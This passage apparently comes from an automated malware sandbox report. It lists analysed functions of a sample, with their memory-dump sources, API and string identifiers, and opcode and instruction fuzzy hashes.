                Similarity
                • API ID: InternetOpen
                • String ID: <local>
                • API String ID: 2038078732-4266983199
                • Opcode ID: cf965e10a69f15837c5133eae1eceaea1754ca31e94604bb4756d5d176dca9a5
                • Instruction ID: 472025419554a314e36cab7e286a11b9abe0de0c71a436e1612b01f6ace593e5
                • Opcode Fuzzy Hash: cf965e10a69f15837c5133eae1eceaea1754ca31e94604bb4756d5d176dca9a5
                • Instruction Fuzzy Hash: 2311E970580310BBE734CB548E56FBB73A8E718701F20900BF946AB6C0D6F4BA44D759
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00422175, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __fread_nolock_memmove
                • String ID: EA06
                • API String ID: 1988441806-3962188686
                • Opcode ID: e30fdaa4b58fc77a4db6f60c558df5d0a2cc34f588006391faee5d5e1ef80729
                • Instruction ID: 7447840718e5b453b30818605330a81009ef815b81de4dd03f6779db76c911bf
                • Opcode Fuzzy Hash: e30fdaa4b58fc77a4db6f60c558df5d0a2cc34f588006391faee5d5e1ef80729
                • Instruction Fuzzy Hash: A8018931D042287BCB18CB988C12FFEBBF49F41301F00819EF696922C1D578A618C7A4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00423229, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _wcsncpy
                • String ID: C:\Users\user\31956653\thjfdg.xcp$y]A
                • API String ID: 1735881322-518368218
                • Opcode ID: 0adcba03d5b074f395b5de203cca464c1a9d39edfe55914207bf4b5a63d57efb
                • Instruction ID: a0f4e9ce9b6831ea838ded84988b239ca10286d6dda8801bead74f81fd4ac8fc
                • Opcode Fuzzy Hash: 0adcba03d5b074f395b5de203cca464c1a9d39edfe55914207bf4b5a63d57efb
                • Instruction Fuzzy Hash: 81E08C32600119BB9704DE4AD801DBBB36DAEC4620708802AF90893200E2B5AA0543E4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401871, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                Download Yara Rule
                APIs
                • __lock.LIBCMT ref: 00401879
                  • Part of subcall function 004081EE: __mtinitlocknum.LIBCMT ref: 00408204
                  • Part of subcall function 004081EE: __amsg_exit.LIBCMT ref: 00408210
                  • Part of subcall function 004081EE: EnterCriticalSection.KERNEL32(?,?,?,004078A9,0000000D,?,004012DC,?,00000001), ref: 00408218
                  • Part of subcall function 00408115: LeaveCriticalSection.KERNEL32(?,004081EC,0000000A,004081DC,0047D180,0000000C,00408209,?,?,?,004078A9,0000000D,?,004012DC,?), ref: 00408124
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave__amsg_exit__lock__mtinitlocknum
                • String ID: d@$d@
                • API String ID: 2136571680-2768541783
                • Opcode ID: f6e2ae8a607de496982f25214f0b8cc719a7ee260ba6a42859737492ebed458c
                • Instruction ID: 23e99adf80094d735f3cf87ed0f5fa4c1277e7152c4f1a3c1270a13688707159
                • Opcode Fuzzy Hash: f6e2ae8a607de496982f25214f0b8cc719a7ee260ba6a42859737492ebed458c
                • Instruction Fuzzy Hash: 98D012725002546BCB403BB5BD0AA493F55EF85765F11043EF70C9B2A1DD754801978C
                Uniqueness

                Uniqueness Score: -1.00%